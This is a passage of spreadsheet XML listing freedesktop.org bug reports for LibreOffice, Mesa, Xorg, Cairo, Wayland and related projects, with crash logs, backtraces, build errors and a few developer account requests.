I tried to create a personalized salutation in a mail merge using the field conditional text and it works fine if I test it with the option data to fields. The condition fails when printing the document or saving the merged document in a file.
I will attach a simple example (spreadsheet + starting document).</t>
  </si>
  <si>
    <t>jr</t>
  </si>
  <si>
    <t>XORG-76483</t>
  </si>
  <si>
    <t>[NV50 bisected RFC patch] xset dpms force {onoff} does not work over DP</t>
  </si>
  <si>
    <t>Created attachment 96206
RFC patch on top of 34d59508 (drm/nouveau: fix TTM_PL_TT memtype on pre-nv50)
Commit 0a0afd28 (drm/nv50-/disp: move DP link training to core and
train from supervisor) removed a call to 'nouveau_dp_dpms' at the
bottom of nv50_display.c.
Without this call 'xset dpms force {onoff}' does not have any effect
on my DP-attached monitor.
The attached proof-of-concept patch re-adds the call as well as a partial
version of nouveau_dp_dpms which causes 'force off' to work again.
It is not clear to me how to trigger link training in the supervisor
so nouveau_dp_dpms skips that step when handling DRM_MODE_DPMS_ON.
The result is that 'force on' does not cause the monitor to wake up
and the connection is effectively dead.
Could somebody familiar with the driver could comment on the next
steps to undertake to restore the full {onoff} functionality?</t>
  </si>
  <si>
    <t>dd</t>
  </si>
  <si>
    <t>TELEPATHY-32609</t>
  </si>
  <si>
    <t>TpContact should have properties to know subscribe/publish state</t>
  </si>
  <si>
    <t>This is made easy with the Connection.ContactList interface because it has contact attributes.</t>
  </si>
  <si>
    <t>TELEPATHY-51250</t>
  </si>
  <si>
    <t>tp_debug_client_get_messages_async: error is not propagated</t>
  </si>
  <si>
    <t>It should be.</t>
  </si>
  <si>
    <t>LIBREOFFICE-66854</t>
  </si>
  <si>
    <t>FILTER: Import of Drawing shape in Word .doc file has the wrong shadow distance</t>
  </si>
  <si>
    <t>Depending on which 4.x.y.z version opening some of the 
.doc files from http://saltmanz.com/files/Dominion/ seemed
to work but when saving the file as .odt Libreoffice silently dropped the yellow circles even though they were
properly displayed. With later version (4.1.x.y) the shadow of the yellow circles is too far off.
Downgrading to 3.6.6.2 resolved all these problems.
Operating System: Linux (Other)
Version: 4.0.3.3 release</t>
  </si>
  <si>
    <t>M8R-j4i7001</t>
  </si>
  <si>
    <t>WAYLAND-92834</t>
  </si>
  <si>
    <t>Add 3-finger pinch support</t>
  </si>
  <si>
    <t>Bug 85881 only implemented 2-finger pinch. I'd like to be able to have 3-finger pinch getting to the overview on my touchpad as it does on touchscreens.</t>
  </si>
  <si>
    <t>FREEDESKTOP.ORG-9298</t>
  </si>
  <si>
    <t>Hello
I request an account to create a Cairo Ada binding project.
Real name : Damien Carbonne
Email : aetdcarbonne@free.fr
Preferred account name : dcarbonne ?
Best regards</t>
  </si>
  <si>
    <t>aetdcarbonne</t>
  </si>
  <si>
    <t>XORG-24460</t>
  </si>
  <si>
    <t>XORG_CHECK_MALLOC_ZERO needs a default for cross-compiling</t>
  </si>
  <si>
    <t>Created attachment 30271
add fourth argument to AC_RUN_IFELSE
libX11 fails to cross-compile unless --enable-malloc0returnsnull is given during configuration since configure can't run test programs in this situation. This is a sensible conservative default that should be used by default when cross-compiling rather than requiring it to be forced explicitly.</t>
  </si>
  <si>
    <t>MESA-31544</t>
  </si>
  <si>
    <t>bad format in _mesa_format_to_type_and_comps</t>
  </si>
  <si>
    <t>Created attachment 40198
Output from .xsession-errors
After upgrading to KDE 4.5.3 of Fedora 14 KWin fails with the following error:
Mesa 7.9 implementation error: bad format in _mesa_format_to_type_and_comps
Please report at bugzilla.freedesktop.org
Addition output (from .xession-errors) attached.</t>
  </si>
  <si>
    <t>PAPYON-24663</t>
  </si>
  <si>
    <t>delete contact callback</t>
  </si>
  <si>
    <t>When a contact is deleted from the address book the function to be called in an external program receives as parameter an empty contact object i mean with id 00000000....
I notice this while developing amsn2 i worked out a possible fix:
http://github.com/luckyluke/papyon/commit/a2023473a51f716ddd10ebf695b52c69f0d9b114</t>
  </si>
  <si>
    <t>luca.dariz</t>
  </si>
  <si>
    <t>DRI-96659</t>
  </si>
  <si>
    <t>[DP] [BDW] dp to VGA dongle works intermittently</t>
  </si>
  <si>
    <t>I'm trying to get a reliable mini-dp to VGA connection for a dell XPS 13 (9343 Broadwell) to a projector in a lecture theatre. I have a couple of dongles - one Apple mini dp-VGA and one cheap mini dp to VGA/HDMI/DVI combo.
Either works if I just connect to a monitor over a short cable.
In the lecture theatre the Apple dongle doesn't work at all and the cheap combo adapter works sometimes perhaps 1 in 3 times I plug it in.
In windows the Apple dongle works fine.
I have tried setting drm_kms_helper.dp_aux_i2c_transfer_size to 1 and 4 (which solved some problems with the apple adapter on ealier kernels) but this doesn't seem to make a difference now.
I'm running Arch linux with kernel 4.6.0 xorg-server-1.18.3-2 xf86-video-intel-1:2.99.917+662+gb617f80-1
Setting drm.debug=14 The Apple dongle shows me:
[ 3134.274766] [drm:intel_get_hpd_pins] hotplug event received stat 0x00200000 dig 0x10101012 pins 0x00000020
[ 3134.274775] [drm:intel_hpd_irq_handler] digital hpd port B - long
[ 3134.274779] [drm:intel_hpd_irq_storm_detect] Received HPD interrupt on PIN 5 - cnt: 0
[ 3134.274801] [drm:intel_dp_hpd_pulse] got hpd irq on port B - long
[ 3134.275271] [drm:intel_dp_get_dpcd] DPCD: 11 0a 82 01 00 03 01 81 00 00 00 00 00 00 00
[ 3134.275278] [drm:intel_dp_get_dpcd] Display Port TPS3 support: source yes sink no
[ 3134.275285] [drm:intel_dp_print_rates] source rates: 162000 270000 540000
[ 3134.275289] [drm:intel_dp_print_rates] sink rates: 162000 270000
[ 3134.275293] [drm:intel_dp_print_rates] common rates: 162000 270000
[ 3134.276100] [drm:intel_dp_probe_oui] Sink OUI: 000000
[ 3134.276453] [drm:intel_dp_probe_oui] Branch OUI: 0010fa
[ 3134.276467] [drm:i915_hotplug_work_func] running encoder hotplug functions
[ 3134.276472] [drm:i915_hotplug_work_func] Connector DP-1 (pin 5) received hotplug event.
[ 3134.276476] [drm:intel_dp_detect] [CONNECTOR:45:DP-1]
[ 3134.277469] [drm:intel_dp_get_dpcd] DPCD: 11 0a 82 01 00 03 01 81 00 00 00 00 00 00 00
[ 3134.277475] [drm:intel_dp_get_dpcd] Display Port TPS3 support: source yes sink no
[ 3134.277482] [drm:intel_dp_print_rates] source rates: 162000 270000 540000
[ 3134.277488] [drm:intel_dp_print_rates] sink rates: 162000 270000
[ 3134.277493] [drm:intel_dp_print_rates] common rates: 162000 270000
[ 3134.278394] [drm:drm_dp_i2c_do_msg] native defer
[ 3134.279464] [drm:drm_dp_i2c_do_msg] native defer
[ 3134.280620] [drm:drm_dp_i2c_do_msg] I2C nack (result=0 size=0
[ 3134.281072] [drm:drm_dp_i2c_do_msg] native defer
[ 3134.282332] [drm:drm_dp_i2c_do_msg] native defer
[ 3134.283424] [drm:drm_dp_i2c_do_msg] native defer
[ 3134.284222] [drm:drm_dp_i2c_do_msg] I2C nack (result=0 size=0
[ 3134.284665] [drm:drm_dp_i2c_do_msg] native defer
[ 3134.285917] [drm:drm_dp_i2c_do_msg] native defer
[ 3134.286997] [drm:drm_dp_i2c_do_msg] native defer
[ 3134.287774] [drm:drm_dp_i2c_do_msg] I2C nack (result=0 size=0
[ 3134.288208] [drm:drm_dp_i2c_do_msg] native defer
[ 3134.289412] [drm:drm_dp_i2c_do_msg] native defer
[ 3134.290480] [drm:drm_dp_i2c_do_msg] native defer
[ 3134.291255] [drm:drm_dp_i2c_do_msg] I2C nack (result=0 size=0
[ 3134.291687] [drm:drm_dp_i2c_do_msg] native defer
[ 3134.292891] [drm:drm_dp_i2c_do_msg] native defer
[ 3134.293960] [drm:drm_dp_i2c_do_msg] native defer
[ 3134.294733] [drm:drm_dp_i2c_do_msg] I2C nack (result=0 size=0
[ 3134.295165] [drm:drm_dp_i2c_do_msg] native defer
[ 3134.295946] [drm:intel_dp_detect_dpcd] Broken DP branch device ignoring
[ 3134.295949] [drm:i915_hotplug_work_func] Connector HDMI-A-1 (pin 5) received hotplug event.
[ 3134.295951] [drm:intel_hdmi_detect] [CONNECTOR:49:HDMI-A-1]
[ 3134.296187] [drm:do_gmbus_xfer] GMBUS [i915 gmbus dpb] NAK for addr: 0050 w(1)
[ 3134.296189] [drm:do_gmbus_xfer] GMBUS [i915 gmbus dpb] NAK on first message retry
[ 3134.296391] [drm:do_gmbus_xfer] GMBUS [i915 gmbus dpb] NAK for addr: 0050 w(1)
[ 3134.296393] [drm:drm_do_probe_ddc_edid] drm: skipping non-existent adapter i915 gmbus dpb
[ 3134.480116] [drm:intel_get_hpd_pins] hotplug event received stat 0x00200000 dig 0x10101011 pins 0x00000020
[ 3134.480120] [drm:intel_hpd_irq_handler] digital hpd port B - short
[ 3134.480141] [drm:intel_dp_hpd_pulse] got hpd irq on port B - short
[ 3136.805463] [drm:drm_mode_addfb2] [FB:55]
I can provide dmesg traces for other situations if that's at all helpful.</t>
  </si>
  <si>
    <t>DRI-89100</t>
  </si>
  <si>
    <t>[SKL]kms_universal_plane causes call trace</t>
  </si>
  <si>
    <t>System Environment:
--------------------------
Regression: not sure
no-working platforms: SKL
==kernel==
--------------------------
drm-intel-nightly/2a579576e4c01799ec67264c9169e5adeadcc3ff
commit 2a579576e4c01799ec67264c9169e5adeadcc3ff
Author: Daniel Vetter 
Date:   Wed Feb 11 17:16:34 2015 +0100
    drm-intel-nightly: 2015y-02m-11d-16h-11m-28s UTC integration manifest
==Bug detailed description==
-----------------------------
It causes system hang with drm-intel-nightly kernel.Plug serial boot fail so I don't catch any dmesg.
output:
IGT-Version: 1.9-g9846e7f (x86_64) (Linux: 3.19.0_drm-intel-nightly_2a5795_20150212+ x86_64)
Testing connector eDP-1 using pipe A
(kms_universal_plane:5230) CRITICAL: Test assertion failure function functional_test_pipe file kms_universal_plane.c:270:
(kms_universal_plane:5230) CRITICAL: Failed assertion: igt_crc_equal(&amp;test.crc_1 &amp;test.crc_5)
Subtest universal-plane-pipe-A-functional: FAIL (2.228s)
==Reproduce steps==
---------------------------- 
1. ./kms_universal_plane</t>
  </si>
  <si>
    <t>CAIRO-31906</t>
  </si>
  <si>
    <t>cairo 1.10.0 requires XLinearGradient</t>
  </si>
  <si>
    <t>cairo 1.10.0 documents that it requires Xlib if you're going to build the xlib backend which is obviously pretty important on UNIX and Linux.  The README doesn't document which *version* of xlib it requires though.
At least with cairo 1.8.x it was possible to build against the Xlib that comes with Solaris 10 which I believe is 6.8.x.
With 1.10.0 the build now fails in cairo-xlib-surface.c.  The Solaris Xlib is apparently missing XLinearGradient:
libtool: compile:  cc -xO4 -xipo=2 -DHAVE_CONFIG_H -I. -I.. -I. -D_REENTRANT -I/local/include/pixman-1 -I/local/include -I/local/include/freetype2 -I/local/include -I/local/include/libpng14 -DXTHREADS -I/local/include -I/usr/openwin/include -I/usr/openwin/include -erroff=E_ENUM_TYPE_MISMATCH_ARG -erroff=E_ENUM_TYPE_MISMATCH_OP -Wp-D_FORTIFY_SOURCE=2 -I/local/include -I/local/gnu/include -I/usr/local/include -Xa -xO4 -xipo=2 -xstrconst -KPIC -mt -xtarget=native -m64 -xarch=native -I/local/include -I/local/gnu/include -I/usr/local/include -D_POSIX_PTHREAD_SEMANTICS -c cairo-xlib-surface.c  -KPIC -DPIC -o .libs/cairo-xlib-surface.o
cairo-xlib-surface.c line 2133: undefined symbol: XLinearGradient
cairo-xlib-surface.c line 2133: syntax error before or at: grad
cairo-xlib-surface.c line 2161: undefined symbol: grad
I'll be happy to provide more information if needed.  I'm just wondering if the requirement for Xlib was intentionally increased or if this was more of an accident?</t>
  </si>
  <si>
    <t>CAIRO-7424</t>
  </si>
  <si>
    <t>--disable-xlib-xrender not working</t>
  </si>
  <si>
    <t>Currently --disable-xlib-xrender only causes the cflags/libs for xrender to not
be included.  This makes the code not build not surprisingly.  We need to
#if/endif out the xrender stuff in cairo-xlib-*.c to allow building without
xrender.  Donno how hard that change is.</t>
  </si>
  <si>
    <t>XORG-4656</t>
  </si>
  <si>
    <t>Radeon driver does ignores Modelines when using digital displays</t>
  </si>
  <si>
    <t>The Radeon driver ignores ModeLines when using digital displays. The reasoning
behind this is understandable (see comments in source) but user settings should
always be honored.
This prevents i.e. reducing the clock where appropriate (Notebooks)
Probably an override option could be provided.</t>
  </si>
  <si>
    <t>SHARED-MIME-INFO-9424</t>
  </si>
  <si>
    <t>wrong magic for application/x-gnumeric</t>
  </si>
  <si>
    <t>magic for gnumeric is gmr:Workbook but recent gnumeric versions write gnm:Workbook.</t>
  </si>
  <si>
    <t>jean.brefort</t>
  </si>
  <si>
    <t>MESA-96843</t>
  </si>
  <si>
    <t>Crash with virgl+piglit</t>
  </si>
  <si>
    <t>Running virglrenderer: 
vtest/virgl_test_server --no-fork
and 
LIBGL_ALWAYS_SOFTWARE=y GALLIUM_DRIVER=virpipe  /usr/lib64/piglit/bin/shader_runner /usr/lib64/piglit/tests/spec/glsl-1.30/execution/switch/vs-uniform.shader_test -auto
Will lead to this crash:
brw_shader.cpp:1087: void backend_instruction::remove(bblock_t*): Assertion `inst_is_in_block(block this) || !Instruction not in block' failed</t>
  </si>
  <si>
    <t>LIBREOFFICE-55315</t>
  </si>
  <si>
    <t>EDITING: Program crashes at autocompletion</t>
  </si>
  <si>
    <t>Created attachment 67679
Crash log
Editing text (mostly modifying pressing back button extending the words) sometimes crashes the Writer without document recovery. The attached logs suggest a problem within the new LatinLookupTree autocompletion class:
# Problematic frame:
# C  [libeditenglo.so+0x16b33c]  LatinLookupTree::suggestAutoCompletion() const+0x54
#
...
Stack: [0xbfc810000xbfcd1000]  sp=0xbfccc0d0  free space=300k
Native frames: (J=compiled Java code j=interpreted Vv=VM code C=native code)
C  [libeditenglo.so+0x16b33c]  LatinLookupTree::suggestAutoCompletion() const+0x54
C  [libswlo.so+0x2b1526]  SwAutoCompleteWord::GetWordsMatching(String std::vector &gt;&amp; unsigned char) const+0x7a
C  [libswlo.so+0x6fa163]  QuickHelpData::FillStrArr(SwWrtShell&amp; String const&amp; unsigned char)+0x58d
C  [libswlo.so+0x6faa29]  SwEditWin::ShowAutoTextCorrectQuickHelp(String const&amp; SvxAutoCorrCfg* SvxAutoCorrect* unsigned char)+0x9d
C  [libswlo.so+0x6fe52b]  SwEditWin::KeyInput(KeyEvent const&amp;)+0x2929
C  [libvcllo.so+0x2c3609]  ImplHandleKey(Window* unsigned short unsigned short unsigned short unsigned short unsigned char)+0x3fc
C  [libvcllo.so+0x2c5983]  ImplWindowFrameProc(Window* SalFrame* unsigned short void const*)+0x1c8
C  [libvclplug_gtklo.so+0x41511]  SalFrame::CallCallback(unsigned short void const*) const+0x21
C  [libvclplug_gtklo.so+0x3c02f]  GtkSalFrame::doKeyCallback(unsigned int unsigned int unsigned short unsigned char unsigned int unsigned short bool bool)+0xbb
C  [libvclplug_gtklo.so+0x3dbac]  GtkSalFrame::IMHandler::signalIMCommit(_GtkIMContext* char* void*)+0x13a</t>
  </si>
  <si>
    <t>LIBREOFFICE-85451</t>
  </si>
  <si>
    <t>Draw text box content is invisible when TextContourFrame property is true</t>
  </si>
  <si>
    <t>Created attachment 108409
The file is the document that exhibits the incorrect behavior
Open the attached spreadsheet in LibreOffice 4.3.2 or 4.3.3rc
Under the title Feuille de Personnage is a big white rectangle. This is incorrect.
Open the same file with OpenOffice 4.1.1 and that big white rectangle is displayed properly with its contents.
It used to work with previous versions of LibreOffice.
Serious regression.
Gilles</t>
  </si>
  <si>
    <t>gilles</t>
  </si>
  <si>
    <t>LIBREOFFICE-67783</t>
  </si>
  <si>
    <t>FORMATTING: Conditional formatting problem</t>
  </si>
  <si>
    <t>Created attachment 83657
Spreadsheet with conditional formatting (alternate colours)
I set up conditional formatting in Calc such that different background colours appear on alternate rows. If new rows are inserted directly below the rows where the conditional formatting is applied the new rows correctly display the alternate background colours. However when the spreadsheet document is saved closed and then reopened the new rows lose the alternate background colours (i.e. the conditional formatting is lost). See the attached file.
It should be noted that this problem was not inherited from OpenOffice. If the attached file is opened in OpenOffice and new rows are inserted in the same way (i.e. directly below the conditional formatting range) the alternate colours applied to the new rows are preserved after document reopening.</t>
  </si>
  <si>
    <t>rupertparsons.work</t>
  </si>
  <si>
    <t>FREEDESKTOP.ORG-7522</t>
  </si>
  <si>
    <t>Name: Ali Sabil
Prefered username: asabil
Email address: ali.sabil@gmail.com
GPG key: 0B47 CE40 3DB0 8A77 E05D  B654 A923 262F 2F6E FE47
SSH key: ssh-dss
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</t>
  </si>
  <si>
    <t>LIBREOFFICE-58251</t>
  </si>
  <si>
    <t>BUGZILLAASSISTANT: Inappropriate regression keyword</t>
  </si>
  <si>
    <t>It seems that the BSA adds the regression key word automatically if there is a Latest known-working version selected before the Version.
This often is correct but sometimes of course the bug is related to a new feature for this kind of bugs I believe it's common sense that we do not set the regression Keyword.
Although the number of bugs with inappropriate regression might be not too big the problem is annoying because this keyword means some kind of alarm for many of us. So I wold prefer a solutions that adds a text to the comment as a reminder for QA staff (Possibly regression?).
I recommend to wait for some comments and then to decide whether we leave this BSA feature as it is or do a modification?
Operating System: Windows 7
Last worked in: 3.6.4.3 release</t>
  </si>
  <si>
    <t>GSTREAMER-15373</t>
  </si>
  <si>
    <t>New Account Requested</t>
  </si>
  <si>
    <t>Hi
According to the instructions listed there : http://www.freedesktop.org/wiki/AccountRequests
This is my public informations required:
Real name: Julien Isorce
Email: julien.isorce@gmail.com
Preferred account name: julien.isorce@gmail.com
---- BEGIN SSH2 PUBLIC KEY ----
Comment: rsa-key-20080406
AAAAB3NzaC1yc2EAAAABJQAAAIEA29g5LbwtKPGXl6pprWEv89WDyGmBrhh1gGSq
9X6PklzBL2HU8xR9HFbRhTCFKXrM1KL8FxZofz720DTof1j+aDQtYDtmTdXGjntN
sKwBbwX8zQNOewI+hU7GFq7s+EX48eE5ZZPxMFwlPJeeCSNQhbAUSekSBh23aG6o
P5IxiYE=
---- END SSH2 PUBLIC KEY ----
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: GnuPG v1.4.9 (MingW32)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=1RbO
-----END PGP PUBLIC KEY BLOCK-----
Sincerely
Julien I.</t>
  </si>
  <si>
    <t>MESA-4696</t>
  </si>
  <si>
    <t>segfault in server-side glXMakeCurrent path with indirect rendering</t>
  </si>
  <si>
    <t>I'm suffering from bug 4574 so DRI doesn't work and X falls back to software
rendering this is annoying but the Mach64 is bad enough at 3D that it's not a
killer.
But on XORG-6_8_99_900 firing up amaroK clicking on the analyzer pane until a
graphical analyzer fires up and then hitting `D' leads to the following crash:
Program received signal SIGSEGV Segmentation fault.
_mesa_make_current (newCtx=0x8665da8 drawBuffer=0xb6fbd008
readBuffer=0xb6fbd008) at context.c:1563
1563	         if (!newCtx-&gt;DrawBuffer || newCtx-&gt;DrawBuffer-&gt;Name == 0) {
(gdb) bt
#0  _mesa_make_current (newCtx=0x8665da8 drawBuffer=0xb6fbd008
readBuffer=0xb6fbd008) at context.c:1563
#1  0xb7de3bd2 in XMesaMakeCurrent2 (c=0x8665da8 drawBuffer=0xb6fbd008
readBuffer=0xb6fbd008) at xm_api.c:2069
#2  0xb7de12d5 in __MESA_makeCurrent (gc=0x8665da8) at xf86glx.c:830
#3  0xb7ec17bc in DoMakeCurrent (cl=0x86109e8 drawId=10488977 readId=10488977
contextId=140926376 tag=1) at glxcmds.c:643
#4  0xb7ec1989 in __glXMakeCurrent (cl=0xb6fef008 pc=0xb6fbd008 ) at
glxcmds.c:397
#5  0xb7ec5410 in __glXDispatch (client=0x859e4a8) at glxext.c:433
#6  0x080c63e2 in Dispatch () at dispatch.c:459
#7  0x080d29f5 in main (argc=13 argv=0xbfb68d64 envp=0xb6fef008) at main.c:450
(gdb) print newCtx
$1 = (GLcontext *) 0x8665da8
(gdb) print newCtx-&gt;DrawBuffer
$2 = (GLframebuffer *) 0xb6fef008
(gdb) print newCtx-&gt;DrawBuffer-&gt;Name
Cannot access memory at address 0xb6fef008
(gdb) frame 4
#4  0xb7ec1989 in __glXMakeCurrent (cl=0xb6fef008 pc=0xb6fbd008 ) at
glxcmds.c:397
397	    return DoMakeCurrent( cl req-&gt;drawable req-&gt;drawable
(gdb) print cl
$7 = (__GLXclientState *) 0xb6fef008
(gdb) print *cl
Cannot access memory at address 0xb6fef008
Probable buffer overrun somewhere I'd say. I can do more debugging if anyone wants.</t>
  </si>
  <si>
    <t>nix</t>
  </si>
  <si>
    <t>WAYLAND-94602</t>
  </si>
  <si>
    <t>Tests fail to build when build with LTO on gcc 5.3.0</t>
  </si>
  <si>
    <t>weston-test-runner complains about undefined reference to __start_test_section and __stop_test_section when Weston is built with -flto.
Disabling all tests allows it to build fine and the LTO build gains 0.7Â MiB of installed size compared to the non-LTO build.</t>
  </si>
  <si>
    <t>LIBREOFFICE-54771</t>
  </si>
  <si>
    <t>: Build failure with --with-system-boost</t>
  </si>
  <si>
    <t>Problem description: 
Attempting to compile LibreOffice 3.6.1.2 with system boost results in
[ build LNK ] Library/libsclo.so
/home/bero/packages/libreoffice/BUILD/libreoffice-3.6.1/workdir/unxlngx6.pro/CxxObject/sc/source/core/tool/scmatrix.o:scmatrix.cxx:function _GLOBAL__sub_I_scmatrix.cxx: error: undefined reference to 'boost::system::generic_category()'
/home/bero/packages/libreoffice/BUILD/libreoffice-3.6.1/workdir/unxlngx6.pro/CxxObject/sc/source/core/tool/scmatrix.o:scmatrix.cxx:function _GLOBAL__sub_I_scmatrix.cxx: error: undefined reference to 'boost::system::generic_category()'
/home/bero/packages/libreoffice/BUILD/libreoffice-3.6.1/workdir/unxlngx6.pro/CxxObject/sc/source/core/tool/scmatrix.o:scmatrix.cxx:function _GLOBAL__sub_I_scmatrix.cxx: error: undefined reference to 'boost::system::system_category()'
collect2: error: ld returned 1 exit status
make[2]: *** [/home/bero/packages/libreoffice/BUILD/libreoffice-3.6.1/workdir/unxlngx6.pro/LinkTarget/Library/libsclo.so] Error 1
make[2]: Leaving directory `/home/bero/packages/libreoffice/BUILD/libreoffice-3.6.1/tail_build'
make[1]: *** [tail_build] Error 2
because the build system forgets to link to libboost_system.</t>
  </si>
  <si>
    <t>XORG-1740</t>
  </si>
  <si>
    <t>Sometimes X shows strange horizontal lines and random dots in images when using radeon driver after shutting down X screen is blank</t>
  </si>
  <si>
    <t>When I viewed some povray rendered images yesterday I noticed some strange
horizontal lines and random dots in all images. When I moved the image window or
resized it the lines and dots moved to another position within the image. 
After switching to a text console with ctrl+alt+f1 and going back to X with
ctrl+alt+f7 the lines and dots disappeared but after shutting down X I ended
up with a blank screen (maybe that is related to this problem).
Since most of the pictures are .png but some are .bmp I'm really sure that
this is a bug in Xorg also because I noticed the problem in Kuickshow
Konqueror and Mozilla.
I use:
* Gentoo Linux
* xorg-x11-6.8.0-r1 from portage (should be almost the same as the official
xorg-6.8.1)
* radeon driver from xorg with an ATI Mobility Radeon 9600
* vanilla Kernel 2.6.9 without framebuffer
* sys-libs/glibc-2.3.4.20040808-r1</t>
  </si>
  <si>
    <t>mrsteven</t>
  </si>
  <si>
    <t>LIBREOFFICE-55522</t>
  </si>
  <si>
    <t>FILEOPEN: paticular .CDR (7) shows pixel picture text contents blue instead of read</t>
  </si>
  <si>
    <t>Created attachment 67958
Sample Document
Steps to reproduce:
1. Open attached staefa.cdr in LibO 3.6
   Expected: Text is red
   Actual: Text is blue
I created this document in 2001 and can't remember whether I scanned that or made a snapshot of a PDF or whatever else.
The problem ersists when I open and save the sample document with CorelDRAW X6
I have too few sample documents to test whether the problem is a general one ofonly for that particular document
Browser: Mozilla/5.0 (Windows NT 6.1 WOW64 rv:15.0) Gecko/20120909 Firefox/15.0.1 SeaMonkey/2.12.1</t>
  </si>
  <si>
    <t>MESA-29953</t>
  </si>
  <si>
    <t>[r300g] Heroes of Newerth: texture problems</t>
  </si>
  <si>
    <t>Created attachment 38370
Screenshot
The game Heroes of Newerth is showing problems when texture compression (through libtxc_dxtn) is used: most of the menu becomes totally black.
Removing libtxc_dxtn.so or launching the game with MESA_EXTENSION_OVERRIDE=-GL_EXT_texture_compression_s3tc -GL_S3_s3tc makes it work again. (Though the S2 Games logo that should be visible before the menu loads is still not there with S3TC disabled)
Neither llvmpipe or softpipe seems to be affected by this problem.
I have tried git from a few months back and the result is the same so I don't think this is a regression.
System environment:
-- system architecture: 32-bit
-- Linux distribution: Debian unstable
-- GPU: RV570
-- Model: Asus EAX1950Pro 256MB
-- Display connector: DVI
-- xf86-video-ati: fd686668289258ffaf6b81057545e50612aac6a8
-- xserver: 1.9.0
-- mesa: dd5ef33e3c2ac7886ca71344e41201d0be2062c0
-- drm: b61e81a191d3a5c269c5f7c40199aebc9ebc034c
-- kernel: 2.6.35</t>
  </si>
  <si>
    <t>PULSEAUDIO-98793</t>
  </si>
  <si>
    <t>pulseaudio fails to build from git master using jhbuild</t>
  </si>
  <si>
    <t>Created attachment 128080
pulseaudio buildlog
building pulseaudio from current git master fails.
Build log attached.
Possible relevant part from log:
In file included from modules/xen/module-xenpv-sink.c:52:0:
/usr/include/xs.h:1:2: warning: #warning xs.h is deprecated use xenstore.h instead [-Wcpp]
 #warning xs.h is deprecated use xenstore.h instead
  ^~~~~~~
modules/xen/module-xenpv-sink.c:141:1: error: unknown type name â€˜xc_evtchnâ€™
 xc_evtchn* xce
 ^~~~~~~~~
modules/xen/module-xenpv-sink.c:142:1: error: unknown type name â€˜evtchn_port_or_error_tâ€™
 evtchn_port_or_error_t xen_evtchn_port
 ^~~~~~~~~~~~~~~~~~~~~~
modules/xen/module-xenpv-sink.c: In function â€˜xen_cleanupâ€™:
modules/xen/module-xenpv-sink.c:246:5: warning: implicit declaration of function â€˜xc_evtchn_notifyâ€™ [-Wimplicit-function-declaration]
     xc_evtchn_notify(xce xen_evtchn_port)
     ^~~~~~~~~~~~~~~~
modules/xen/module-xenpv-sink.c:248:5: warning: implicit declaration of function â€˜xc_evtchn_closeâ€™ [-Wimplicit-function-declaration]
     xc_evtchn_close(xce)
     ^~~~~~~~~~~~~~~
modules/xen/module-xenpv-sink.c: In function â€˜module_xenpv_sink_LTX_pa__initâ€™:
modules/xen/module-xenpv-sink.c:418:11: warning: implicit declaration of function â€˜xc_evtchn_openâ€™ [-Wimplicit-function-declaration]
     xce = xc_evtchn_open(NULL 0)
           ^~~~~~~~~~~~~~
modules/xen/module-xenpv-sink.c:418:9: warning: assignment makes pointer from integer without a cast [-Wint-conversion]
     xce = xc_evtchn_open(NULL 0)
         ^
modules/xen/module-xenpv-sink.c:425:23: warning: implicit declaration of function â€˜xc_evtchn_bind_unbound_portâ€™ [-Wimplicit-function-declaration]
     xen_evtchn_port = xc_evtchn_bind_unbound_port(xce 0)
Thanks.</t>
  </si>
  <si>
    <t>sadiq</t>
  </si>
  <si>
    <t>XORG-18687</t>
  </si>
  <si>
    <t>[915GM SDVO-VGA] no display on 2 VGA on POS</t>
  </si>
  <si>
    <t>Created attachment 20551
xorg.conf file configured for 2 external monitors
---Problem Description---
Both primary and secondary VGA monitor have no displays (blank screen) when both are connected to the system.
Single display with 1 VGA monitor has no display problem. The video driver used for i915GM is 'intel'.
---uname output---
2.6.27.5-2-pae #1 SMP 2008-10-16 20:35:15 +0200 i686 i686 i386 GNU/Linux
---distros---
SLED11 Beta
---Steps to Reproduce---
1) Connect 2 VGA monitors to 2 VGA output interfaces of the system.
2) Boot up the system into SLED11</t>
  </si>
  <si>
    <t>lewsm</t>
  </si>
  <si>
    <t>FREEDESKTOP.ORG-38099</t>
  </si>
  <si>
    <t>I'd like to request an account to work on various wayland components (core xwayland network compositor).
Since there is no wayland product on bugzilla I assigned this bug to freedesktop.org but maybe it would be a good idea to create it :).
I'd like my account to be named 'iksaif'</t>
  </si>
  <si>
    <t>corentin.chary</t>
  </si>
  <si>
    <t>TELEPATHY-59165</t>
  </si>
  <si>
    <t>g_type_init is deprecated from GLib 2.35.1</t>
  </si>
  <si>
    <t>g_type_init is deprecated from GLib 2.35.1 which causes build failures when building against latest versions of GLib.
Although GLIB_DISABLE_DEPRECATION_WARNINGS is defined in config.h some files do not include it.
(I believe 2.34.x is the latest version that we can depend on so removing the g_type_init is not an option yet.)</t>
  </si>
  <si>
    <t>DRI-73652</t>
  </si>
  <si>
    <t>[SNB/IVB/HSW/BYT/BDW]igt/gem_reset_stats causes *ERROR* context hanging too fast declaring banned!</t>
  </si>
  <si>
    <t>Created attachment 92117
dmesg
System Environment:
--------------------------
Platform: SNB/IVB/HSW/BYT
kernel:   (drm-intel-nightly)07db3e0b8568d81226e2e17dbb1b340668cb2287
Bug detailed description:
-------------------------
Run ./gem_reset_stats --run-subtest ban [   88.707592] [drm:i915_context_is_banned] *ERROR* context hanging too fast declaring banned! appears.
It always has this issue.
output:
IGT-Version: 1.5-g1552aa2 (x86_64) (Linux: 3.13.0-rc7_drm-intel-nightly_07db3e_20140115+ x86_64)
4:1 reset status 1 differs from assumed 2
Test assertion failure function test_ban file gem_reset_stats.c:528:
Last errno: 5 Input/output error
Failed assertion: _assert_reset_status(fd ctx_good (1 &lt;&lt; 1)) == 0
Subtest ban: FAIL
Reproduce steps:
----------------------------
1. ./gem_reset_stats --run-subtest ban</t>
  </si>
  <si>
    <t>REALMD-56034</t>
  </si>
  <si>
    <t>Make 'realm discover' only print out one realm per domain</t>
  </si>
  <si>
    <t>Printing out multiple realms for a single domain is confusing and wordy.
It's also not clear which one will be used by default.
We  should filter out multiple realms for the same domain being printed
from 'realm discover' unless --all is used.</t>
  </si>
  <si>
    <t>MESA-106598</t>
  </si>
  <si>
    <t>[glk] devinfo-&gt;l3_banks not initialized for some GLK gpus</t>
  </si>
  <si>
    <t>devinfo-&gt;l3_banks is not initialized for GLK gpus with PCI device ID 3185. This causes deqp cts and piglit tests to fail:
shader_runner: ../src/intel/common/gen_l3_config.c:314: get_l3_way_size: Assertion `devinfo-&gt;l3_banks' failed.</t>
  </si>
  <si>
